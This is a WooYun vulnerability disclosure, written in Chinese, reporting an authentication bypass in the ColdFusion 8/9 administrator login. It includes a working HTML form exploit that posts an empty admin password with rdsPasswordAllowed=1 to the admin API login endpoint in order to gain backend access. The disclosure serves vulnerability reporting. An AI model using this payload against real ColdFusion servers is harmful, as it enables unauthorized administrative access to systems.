当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035234

漏洞标题:绕过coldfusion8登录界面登录后台

相关厂商:coldfusion

漏洞作者: webmail

提交时间:2013-08-25 13:52

修复时间:2013-08-25 13:52

公开时间:2013-08-25 13:52

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:6

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-08-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

coldfusion8的后台对登录过滤不严,攻击者只需提交一项表单即可绕过后台验证直接登录

详细说明:

coldfusion版本8后台登录时,只需要提交一个表单,就可以绕过用户名密码验证,登陆后台

漏洞证明:

1.jpg


这是登录页面
然后本地写一个表单提交页面

<form action="http://XXXX.XXX/CFIDE/adminapi/administrator.cfc?method=login" method="post">
    <input type="hidden" name="adminpassword" value="">
    <input type="hidden" name="rdsPasswordAllowed" value="1">
    <input type="submit">
</form>


保存为html运行

2.jpg


点击"提交查询"
然后再次访问登录页面,此时已进入后台

3.jpg


此漏洞使用于coldfusion8、9版本

修复方案:

修复方案是添加过滤方式吧,我也不清楚

版权声明:转载请注明来源 webmail@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝